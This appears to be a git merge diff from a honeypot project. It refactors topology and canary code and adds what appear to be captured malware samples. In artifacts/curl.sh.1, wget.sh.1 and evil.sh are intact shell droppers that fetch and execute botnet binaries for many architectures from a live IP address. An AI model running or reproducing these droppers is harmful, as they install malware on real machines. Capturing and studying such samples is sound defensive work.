Merge branch 'merge-rehearsal' into dev
# Conflicts: # decnet/templates/postgres/server.py # decnet/templates/rdp/Dockerfile # decnet/templates/redis/Dockerfile # decnet/templates/smtp/Dockerfile # decnet/templates/smtp/entrypoint.sh # decnet/templates/snmp/Dockerfile # decnet/templates/snmp/entrypoint.sh # decnet/templates/tftp/Dockerfile # decnet/templates/tftp/entrypoint.sh # decnet/templates/vnc/Dockerfile # decnet/templates/vnc/entrypoint.sh # templates/rdp/Dockerfile # templates/smb/Dockerfile # templates/smtp/Dockerfile # templates/smtp/entrypoint.sh # templates/snmp/Dockerfile # templates/snmp/entrypoint.sh # templates/tftp/Dockerfile # templates/tftp/entrypoint.sh # templates/vnc/Dockerfile # tests/services/test_smtp_relay.py
This commit is contained in:
6
.gitignore
vendored
6
.gitignore
vendored
@@ -51,3 +51,9 @@ schem
|
|||||||
|
|
||||||
# pydeps-style dependency graph dumps from local analysis runs.
|
# pydeps-style dependency graph dumps from local analysis runs.
|
||||||
deps.txt
|
deps.txt
|
||||||
|
|
||||||
|
# Node modules vendored under decnet/canary/ for the obfuscator helper.
|
||||||
|
# The package.json is the source of truth; modules are reinstalled at
|
||||||
|
# build/deploy time.
|
||||||
|
node_modules/
|
||||||
|
package-lock.json
|
||||||
|
|||||||
@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
|
|||||||
|
|
||||||
| Slug | Services | OS Fingerprint | Description |
|
| Slug | Services | OS Fingerprint | Description |
|
||||||
|---|---|---|---|
|
|---|---|---|---|
|
||||||
|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
|
||||||
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
||||||
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
||||||
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
||||||
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
|
|||||||
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
||||||
|
|
||||||
```ini
|
```ini
|
||||||
|
[deaddeck-1]
|
||||||
|
amount=1
|
||||||
|
archetype=deaddeck
|
||||||
|
ssh.password=admin
|
||||||
|
|
||||||
[decky-webmail.http]
|
[decky-webmail.http]
|
||||||
server_header = Apache/2.4.54 (Debian)
|
server_header = Apache/2.4.54 (Debian)
|
||||||
fake_app = wordpress
|
fake_app = wordpress
|
||||||
|
|||||||
3
artifacts/curl.sh
Normal file
3
artifacts/curl.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
[0] Downloading 'http://31.56.209.39/curl.sh' ...
|
||||||
|
Saving 'curl.sh.1'
|
||||||
|
HTTP response 200 OK [http://31.56.209.39/curl.sh]
|
||||||
46
artifacts/curl.sh.1
Normal file
46
artifacts/curl.sh.1
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
ulimit -n 4096
|
||||||
|
ulimit -n 999999
|
||||||
|
ulimit -v 2097152
|
||||||
|
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||||
|
rm -rf odin*
|
||||||
|
rm -rf bizy*
|
||||||
|
rm -rf rs*
|
||||||
|
rm -rf *.sh
|
||||||
|
|
||||||
|
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||||
|
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||||
|
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||||
|
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||||
|
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||||
|
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||||
|
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||||
|
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||||
|
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||||
|
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||||
|
|
||||||
|
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
|
||||||
|
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
|
||||||
|
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
|
||||||
|
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
|
||||||
|
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
|
||||||
|
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
|
||||||
|
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
|
||||||
|
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
|
||||||
|
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
|
||||||
|
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
|
||||||
|
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
|
||||||
|
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
|
||||||
|
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
|
||||||
|
|
||||||
|
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||||
|
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||||
|
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||||
|
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||||
|
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||||
|
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||||
|
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
|
||||||
|
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
|
||||||
|
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||||
|
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||||
|
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||||
3
artifacts/evil.sh
Normal file
3
artifacts/evil.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
wget http://31.56.209.39/wget.sh -o wget.sh
|
||||||
|
|
||||||
|
wget http://31.56.209.39/curl.sh -o curl.sh
|
||||||
3
artifacts/wget.sh
Normal file
3
artifacts/wget.sh
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
[0] Downloading 'http://31.56.209.39/wget.sh' ...
|
||||||
|
Saving 'wget.sh.1'
|
||||||
|
HTTP response 200 OK [http://31.56.209.39/wget.sh]
|
||||||
46
artifacts/wget.sh.1
Normal file
46
artifacts/wget.sh.1
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
#!/bin/sh
|
||||||
|
ulimit -n 4096
|
||||||
|
ulimit -n 999999
|
||||||
|
ulimit -v 2097152
|
||||||
|
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||||
|
rm -rf odin*
|
||||||
|
rm -rf bizy*
|
||||||
|
rm -rf rs*
|
||||||
|
rm -rf *.sh
|
||||||
|
|
||||||
|
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||||
|
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||||
|
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||||
|
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||||
|
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||||
|
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||||
|
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||||
|
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||||
|
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||||
|
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||||
|
|
||||||
|
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
|
||||||
|
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
|
||||||
|
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
|
||||||
|
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
|
||||||
|
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
|
||||||
|
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
|
||||||
|
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
|
||||||
|
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
|
||||||
|
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
|
||||||
|
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
|
||||||
|
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
|
||||||
|
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
|
||||||
|
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
|
||||||
|
|
||||||
|
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||||
|
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||||
|
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||||
|
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||||
|
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||||
|
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||||
|
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
|
||||||
|
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
|
||||||
|
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||||
|
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||||
|
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||||
BIN
decnet.tar
Normal file
BIN
decnet.tar
Normal file
Binary file not shown.
@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
|
|||||||
return str(tid)
|
return str(tid)
|
||||||
|
|
||||||
|
|
||||||
|
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
|
||||||
|
"""Verify hash integrity and structural validity; return topology_id."""
|
||||||
|
local_hash = canonical_hash(hydrated)
|
||||||
|
if local_hash != version_hash:
|
||||||
|
raise HashMismatch(
|
||||||
|
f"master hash {version_hash!r} does not match agent hash "
|
||||||
|
f"{local_hash!r} — refusing to apply"
|
||||||
|
)
|
||||||
|
issues = _validate_topology(hydrated)
|
||||||
|
if _validation_errors(issues):
|
||||||
|
raise ValidationError(issues)
|
||||||
|
return _topology_id(hydrated)
|
||||||
|
|
||||||
|
|
||||||
|
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
|
||||||
|
"""Tear down the current topology if it differs from topology_id.
|
||||||
|
|
||||||
|
Master is authoritative — a different pinned topology (fully applied,
|
||||||
|
partially applied, or drifted) is torn down before the new apply proceeds.
|
||||||
|
Refusing with 409 would leave the agent stuck in a state only a human
|
||||||
|
could resolve.
|
||||||
|
"""
|
||||||
|
existing = store.current()
|
||||||
|
if existing is None or existing.topology_id == topology_id:
|
||||||
|
return
|
||||||
|
log.info(
|
||||||
|
"superseding topology %s with %s on master authority",
|
||||||
|
existing.topology_id, topology_id,
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
await teardown(existing.topology_id, store)
|
||||||
|
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
||||||
|
log.warning(
|
||||||
|
"best-effort teardown of superseded topology %s failed: %s",
|
||||||
|
existing.topology_id, exc,
|
||||||
|
)
|
||||||
|
# Hard-clear the store row so the new apply isn't blocked by a
|
||||||
|
# half-torn-down predecessor. Leftover docker objects surface via
|
||||||
|
# the next heartbeat's observed block.
|
||||||
|
store.clear(existing.topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
|
||||||
|
"""Create bridge networks, write compose file, and bring up containers.
|
||||||
|
|
||||||
|
Sync/blocking — callers must dispatch via asyncio.to_thread.
|
||||||
|
|
||||||
|
``--always-recreate-deps`` keeps service containers' netns shares
|
||||||
|
fresh: every decky service joins its base's netns via
|
||||||
|
``network_mode: container:<base>``, and that share is bound at
|
||||||
|
service start time. If a base is recreated (e.g. when ``ports:``
|
||||||
|
changes after toggling ``forwards_l3``) but compose decides the
|
||||||
|
services are unchanged, the services keep a stale netns FD
|
||||||
|
pointing at the destroyed base — they end up in an empty
|
||||||
|
namespace with only ``lo``, and external traffic hits a closed
|
||||||
|
port on the live base. Forcing dependents to recreate alongside
|
||||||
|
the base is the cheapest way to make this race impossible.
|
||||||
|
"""
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
client = docker.from_env()
|
||||||
|
for lan in hydrated["lans"]:
|
||||||
|
net_name = _topology_network_name(topology_id, lan["name"])
|
||||||
|
create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
|
||||||
|
write_topology_compose(hydrated, compose_path)
|
||||||
|
_compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
|
||||||
|
|
||||||
|
|
||||||
async def apply(
|
async def apply(
|
||||||
hydrated: dict[str, Any],
|
hydrated: dict[str, Any],
|
||||||
version_hash: str,
|
version_hash: str,
|
||||||
@@ -73,76 +140,11 @@ async def apply(
|
|||||||
Any docker / compose error propagates up; the endpoint maps it
|
Any docker / compose error propagates up; the endpoint maps it
|
||||||
to 500 and records the message on the store row.
|
to 500 and records the message on the store row.
|
||||||
"""
|
"""
|
||||||
local_hash = canonical_hash(hydrated)
|
topology_id = _check_hash_and_validate(hydrated, version_hash)
|
||||||
if local_hash != version_hash:
|
await _teardown_superseded(topology_id, store)
|
||||||
raise HashMismatch(
|
await asyncio.to_thread(_materialise, hydrated, topology_id)
|
||||||
f"master hash {version_hash!r} does not match agent hash "
|
|
||||||
f"{local_hash!r} — refusing to apply"
|
|
||||||
)
|
|
||||||
|
|
||||||
issues = _validate_topology(hydrated)
|
|
||||||
if _validation_errors(issues):
|
|
||||||
raise ValidationError(issues)
|
|
||||||
|
|
||||||
topology_id = _topology_id(hydrated)
|
|
||||||
# Master is authoritative. If a different topology is pinned here
|
|
||||||
# — whether it fully applied, only partially applied (failure
|
|
||||||
# marker row + orphan containers), or drifted — teardown first,
|
|
||||||
# then accept the new one. Refusing with 409 would leave the
|
|
||||||
# agent stuck in a state only a human could resolve.
|
|
||||||
existing = store.current()
|
|
||||||
if existing is not None and existing.topology_id != topology_id:
|
|
||||||
log.info(
|
|
||||||
"superseding topology %s with %s on master authority",
|
|
||||||
existing.topology_id, topology_id,
|
|
||||||
)
|
|
||||||
try:
|
|
||||||
await teardown(existing.topology_id, store)
|
|
||||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
|
||||||
log.warning(
|
|
||||||
"best-effort teardown of superseded topology %s failed: %s",
|
|
||||||
existing.topology_id, exc,
|
|
||||||
)
|
|
||||||
# Hard-clear the store row so the new apply isn't blocked
|
|
||||||
# by a half-torn-down predecessor. Leftover docker objects
|
|
||||||
# will surface via the next heartbeat's observed block.
|
|
||||||
store.clear(existing.topology_id)
|
|
||||||
|
|
||||||
lans = hydrated["lans"]
|
|
||||||
compose_path = _topology_compose_path(topology_id)
|
|
||||||
client = docker.from_env()
|
|
||||||
|
|
||||||
# Bridges + compose are sync/blocking; hop to a thread so we don't
|
|
||||||
# stall the event loop on a slow docker daemon.
|
|
||||||
def _materialise() -> None:
|
|
||||||
for lan in lans:
|
|
||||||
net_name = _topology_network_name(topology_id, lan["name"])
|
|
||||||
internal = not lan["is_dmz"]
|
|
||||||
create_bridge_network(
|
|
||||||
client, net_name, lan["subnet"], internal=internal
|
|
||||||
)
|
|
||||||
write_topology_compose(hydrated, compose_path)
|
|
||||||
# ``--always-recreate-deps`` keeps service containers' netns shares
|
|
||||||
# fresh: every decky service joins its base's netns via
|
|
||||||
# ``network_mode: container:<base>``, and that share is bound at
|
|
||||||
# service start time. If a base is recreated (e.g. when ``ports:``
|
|
||||||
# changes after toggling ``forwards_l3``) but compose decides the
|
|
||||||
# services are unchanged, the services keep a stale netns FD
|
|
||||||
# pointing at the destroyed base — they end up in an empty
|
|
||||||
# namespace with only ``lo``, and external traffic hits a closed
|
|
||||||
# port on the live base. Forcing dependents to recreate alongside
|
|
||||||
# the base is the cheapest way to make this race impossible.
|
|
||||||
_compose_with_retry(
|
|
||||||
"up", "--build", "-d", "--always-recreate-deps",
|
|
||||||
compose_file=compose_path,
|
|
||||||
)
|
|
||||||
|
|
||||||
await asyncio.to_thread(_materialise)
|
|
||||||
|
|
||||||
store.put(topology_id, version_hash, hydrated)
|
store.put(topology_id, version_hash, hydrated)
|
||||||
log.info(
|
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
|
||||||
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
async def teardown(
|
async def teardown(
|
||||||
|
|||||||
@@ -63,6 +63,7 @@ class TopologyStore:
|
|||||||
# The agent is single-process, so there's no real contention —
|
# The agent is single-process, so there's no real contention —
|
||||||
# sqlite's own connection lock is enough.
|
# sqlite's own connection lock is enough.
|
||||||
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
||||||
|
self._conn.row_factory = sqlite3.Row
|
||||||
self._conn.execute(
|
self._conn.execute(
|
||||||
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
||||||
" topology_id TEXT PRIMARY KEY,"
|
" topology_id TEXT PRIMARY KEY,"
|
||||||
@@ -84,11 +85,11 @@ class TopologyStore:
|
|||||||
if row is None:
|
if row is None:
|
||||||
return None
|
return None
|
||||||
return AppliedRow(
|
return AppliedRow(
|
||||||
topology_id=row[0],
|
topology_id=row["topology_id"],
|
||||||
applied_version_hash=row[1],
|
applied_version_hash=row["applied_version_hash"],
|
||||||
hydrated=json.loads(row[2]),
|
hydrated=json.loads(row["hydrated_blob_json"]),
|
||||||
applied_at=int(row[3]),
|
applied_at=int(row["applied_at"]),
|
||||||
last_error=row[4],
|
last_error=row["last_error"],
|
||||||
)
|
)
|
||||||
|
|
||||||
# ---------------------------------------------------------------- writes
|
# ---------------------------------------------------------------- writes
|
||||||
|
|||||||
@@ -13,7 +13,7 @@ from typing import Sequence
|
|||||||
from decnet.asn.base import Provider
|
from decnet.asn.base import Provider
|
||||||
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
||||||
from decnet.asn.iptoasn.parse import parse_file
|
from decnet.asn.iptoasn.parse import parse_file
|
||||||
from decnet.asn.lookup import AsnLookup
|
from decnet.asn.lookup import AsnLookup, Range
|
||||||
from decnet.asn.paths import ensure_root
|
from decnet.asn.paths import ensure_root
|
||||||
|
|
||||||
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
||||||
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
|
|||||||
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
||||||
)
|
)
|
||||||
|
|
||||||
ranges = []
|
ranges: list[Range] = []
|
||||||
for path in self.data_paths():
|
for path in self.data_paths():
|
||||||
if not path.exists():
|
if not path.exists():
|
||||||
continue
|
continue
|
||||||
|
|||||||
@@ -54,6 +54,7 @@ SYSTEM = "system"
|
|||||||
CREDENTIAL = "credential"
|
CREDENTIAL = "credential"
|
||||||
ORCHESTRATOR = "orchestrator"
|
ORCHESTRATOR = "orchestrator"
|
||||||
CANARY = "canary"
|
CANARY = "canary"
|
||||||
|
SMTP = "smtp"
|
||||||
|
|
||||||
|
|
||||||
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
||||||
@@ -83,6 +84,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
|
|||||||
# syslog sidechannel too) to interleave substrate-change markers into
|
# syslog sidechannel too) to interleave substrate-change markers into
|
||||||
# attacker traversals.
|
# attacker traversals.
|
||||||
DECKY_MUTATION = "mutation"
|
DECKY_MUTATION = "mutation"
|
||||||
|
# Per-service add/remove on a deployed decky (live; no full redeploy).
|
||||||
|
# Payload carries ``decky_name``, ``service_name``, optional
|
||||||
|
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
|
||||||
|
# that watch substrate shape (correlator, dashboard, profiler) reconcile
|
||||||
|
# off these without waiting for the next decnet-state.json snapshot.
|
||||||
|
DECKY_SERVICE_ADDED = "service_added"
|
||||||
|
DECKY_SERVICE_REMOVED = "service_removed"
|
||||||
|
# Per-service config change (the schema-driven Inspector form). Payload
|
||||||
|
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
|
||||||
|
# ``service_config`` (the new validated dict), and ``recreated`` — true
|
||||||
|
# when the operator hit Apply (container was force-recreated to pick up
|
||||||
|
# the new env), false when they only hit Save (DB-only).
|
||||||
|
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
|
||||||
|
|
||||||
# Attacker event types (second token under the ``attacker`` root). First
|
# Attacker event types (second token under the ``attacker`` root). First
|
||||||
# sighting, session boundary transitions, and score-threshold crossings
|
# sighting, session boundary transitions, and score-threshold crossings
|
||||||
@@ -381,6 +395,16 @@ def system_control(worker: str) -> str:
|
|||||||
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
|
||||||
|
|
||||||
|
|
||||||
|
def smtp(event_type: str) -> str:
|
||||||
|
"""Build ``smtp.<event_type>``.
|
||||||
|
|
||||||
|
*event_type* may contain dots (e.g. ``probe.pending``).
|
||||||
|
"""
|
||||||
|
if not event_type:
|
||||||
|
raise ValueError("smtp topic requires a non-empty event_type")
|
||||||
|
return f"{SMTP}.{event_type}"
|
||||||
|
|
||||||
|
|
||||||
def _reject_tokens(*parts: str) -> None:
|
def _reject_tokens(*parts: str) -> None:
|
||||||
"""Reject topic segments that would break NATS-style tokenization.
|
"""Reject topic segments that would break NATS-style tokenization.
|
||||||
|
|
||||||
|
|||||||
18
decnet/canary/_obfuscate_helper.js
Normal file
18
decnet/canary/_obfuscate_helper.js
Normal file
@@ -0,0 +1,18 @@
|
|||||||
|
// Node helper invoked by decnet.canary.obfuscator.
|
||||||
|
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
|
||||||
|
// Kept dependency-light on purpose: only javascript-obfuscator.
|
||||||
|
const JsObf = require('javascript-obfuscator');
|
||||||
|
|
||||||
|
let raw = '';
|
||||||
|
process.stdin.setEncoding('utf8');
|
||||||
|
process.stdin.on('data', (chunk) => { raw += chunk; });
|
||||||
|
process.stdin.on('end', () => {
|
||||||
|
try {
|
||||||
|
const { code, options } = JSON.parse(raw);
|
||||||
|
const result = JsObf.obfuscate(code, options || {});
|
||||||
|
process.stdout.write(result.getObfuscatedCode());
|
||||||
|
} catch (e) {
|
||||||
|
process.stderr.write(String(e && e.stack || e));
|
||||||
|
process.exit(2);
|
||||||
|
}
|
||||||
|
});
|
||||||
@@ -100,6 +100,12 @@ class CanaryArtifact:
|
|||||||
planting. Never leaked to the attacker-facing surface.
|
planting. Never leaked to the attacker-facing surface.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
fingerprint_nonce: Optional[str] = None
|
||||||
|
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
|
||||||
|
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
|
||||||
|
so the worker can validate incoming ``?k=`` params.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
class CanaryGenerator(ABC):
|
class CanaryGenerator(ABC):
|
||||||
"""Produces a fake artifact from scratch."""
|
"""Produces a fake artifact from scratch."""
|
||||||
|
|||||||
@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
|
||||||
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
|
|||||||
"honeydoc_pdf": "http",
|
"honeydoc_pdf": "http",
|
||||||
"ssh_key": "dns", # trip is DNS resolution of host comment
|
"ssh_key": "dns", # trip is DNS resolution of host comment
|
||||||
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
"mysql_dump": "dns", # trip is DNS resolution of subdomain
|
||||||
|
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
|
||||||
|
"fingerprint_svg": "http", # same, embedded inside SVG <script>
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
|
|||||||
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
|
||||||
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
